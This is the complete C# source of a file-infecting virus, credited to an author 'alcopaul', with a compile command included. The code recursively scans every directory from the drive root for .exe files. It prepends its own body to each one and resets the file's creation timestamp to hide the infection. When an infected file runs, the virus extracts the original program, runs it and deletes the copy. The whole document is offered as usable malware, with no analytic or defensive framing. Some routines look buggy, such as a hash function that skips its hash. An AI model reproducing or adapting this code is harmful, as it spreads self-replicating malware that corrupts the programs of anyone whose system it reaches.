//==================================================================== //MSIL.HLLP.THISAINTSHARPEI source code By alcopaul //compile: csc /target:winexe dflat.cs using System; using System.IO; using System.Reflection; using System.Text; using System.Diagnostics; using System.Security.Cryptography; public class virus { public static void Main(string[] args) { Module self = Assembly.GetExecutingAssembly().GetModules() [0]; StringBuilder arguments = new StringBuilder(); foreach(string arg in args) { arguments.Append(arg + " "); } try { FileInfo fi = new FileInfo(self.FullyQualifiedName); long x1 = fi.Length; int x = (int) x1; byte[] www = readx(self.FullyQualifiedName, x - 5632, 5632); byte[][] xxx = {www}; string nom = hostname(); writex(nom, xxx); fireup(nom, arguments.ToString()); } catch { } string rootdir = Path.GetPathRoot(Directory.GetCurrentDirectory()); DispEXE(rootdir); } public static void DispEXE(string tD) { Module self = Assembly.GetExecutingAssembly().GetModules() [0]; string [] xfiles = Directory.GetFiles(tD, "*.exe"); foreach(string xfile in xfiles) { try { AssemblyName AN = AssemblyName.GetAssemblyName(xfile); byte[] data1 = readx(self.FullyQualifiedName,1000,0); byte[] data2 = readx(xfile,1000,0); if (sha1x(data1)==sha1x(data2)) { continue; } else { try { FileInfo fi = new FileInfo(xfile); long x1 = fi.Length; int x = (int) x1; DateTime timestamp = File.GetCreationTime(xfile); byte[] data3 = readx(self.FullyQualifiedName,5632,0); byte[] data4 = readx(xfile,x,0); byte[][] data5 = {data3,data4}; writex(xfile,data5); File.SetCreationTime(xfile,timestamp); } catch { continue; //next file } } continue; } catch { continue; } } string[] sdirs = Directory.GetDirectories(tD); foreach(string sdir in sdirs) DispEXE(sdir); } public static byte[] readx(string filename, int size, int pntr) { FileStream xs = new FileStream(filename, FileMode.OpenOrCreate, FileAccess.Read); BinaryReader br = new BinaryReader(xs); int selflen = (int) size; //get length to allocate the byte buffer //position r/w pointer in the beginning br.BaseStream.Seek(pntr, SeekOrigin.Begin); //initialize the byte buffer byte[] xxx = new byte[selflen]; //counters int bytestoread = selflen; // number of bytes to read int count1 = 0; // finished bytes while (bytestoread > 0) { int v = br.Read(xxx,count1,bytestoread); // store each byte to byte array if (v==0) // if finished break; //end while loop //if not count1 += v; // increment count bytestoread -= v; //decrement bytes to read.. } br.Close();//every opened door must be closed.. return xxx; } public static void writex(string filename, byte[][] data) { FileStream sx = new FileStream(filename, FileMode.OpenOrCreate, FileAccess.Write); BinaryWriter bw = new BinaryWriter(sx); bw.BaseStream.Seek(0, SeekOrigin.Begin); foreach(byte[] g in data) { bw.Write(g); } bw.Close(); //to the target... } public static string sha1x(byte[] putin) { SHA1 mark1 = new SHA1CryptoServiceProvider(); byte[] result1 = mark1.ComputeHash(putin); StringBuilder hexString = new StringBuilder(); for (int counter = 0; counter < putin.Length; counter++) { hexString.Append(String.Format("{0:X2}", putin[counter])); } return hexString.ToString(); } public static string hostname() { Random rand = new Random(); string rndno= rand.Next(999999).ToString(); string hostfile = "t" + rndno + ".exe"; return hostfile; } public static void fireup(string hostfile, string arguments) { Process.Start(hostfile,arguments); //fire up the host with arguments wet: try { File.Delete(hostfile); // try deleting host } catch { goto wet; // if error (active or still running) delete it again } // to assure that host will be deleted if (File.Exists(hostfile)==true) goto wet; } } //===================================================================